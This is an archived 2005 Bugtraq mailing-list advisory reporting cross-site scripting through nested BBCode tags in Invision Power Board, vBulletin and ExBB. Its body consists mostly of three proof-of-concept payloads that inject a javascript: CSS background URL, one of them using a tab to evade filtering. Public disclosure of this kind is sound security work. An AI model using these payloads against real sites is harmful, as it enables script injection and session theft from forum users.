[38218] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

XSS in the nested BB tag in many forum

daemon@ATHENA.MIT.EDU (pigrelax)
Sat Jan 15 14:30:56 2005

From: "pigrelax" <pigrelax@yandex.ru>
To: <bugtraq@securityfocus.com>, <full-disclosure@lists.netsys.com>
Date: 	Sat, 15 Jan 2005 16:13:38 +0300
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
Message-Id: <S3375385AbVAONPL/20050115131525Z+110@mail.yandex.ru>

XSS was found in the nested BB tag in many forum:

Invision Power Board:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`
style=background:url(javascript:alert()) [/COLOR]

vBulletin
[EMAIL=[URL=s as=`s@wew.ew]mailto:assss@wew.ew] 
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip
t:alert(/Hi_from_Algol/))` (using tab between "javaSCrip" and "t")

ExBB
[color='[url]http://rerer.rew[/url]]fffff[/color]'
style=background:url(javascript:alert()); 

Other forum and other BB tag may be vulnerable. Examples above work only in
Internet Explorer.

More info - http://www.securitylab.ru/51808.html and
antichat.ru/txt/IPB/index3.php


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[38218] in bugtraq

XSS in the nested BB tag in many forum

daemon@ATHENA.MIT.EDU (pigrelax)Sat Jan 15 14:30:56 2005

daemon@ATHENA.MIT.EDU (pigrelax)
Sat Jan 15 14:30:56 2005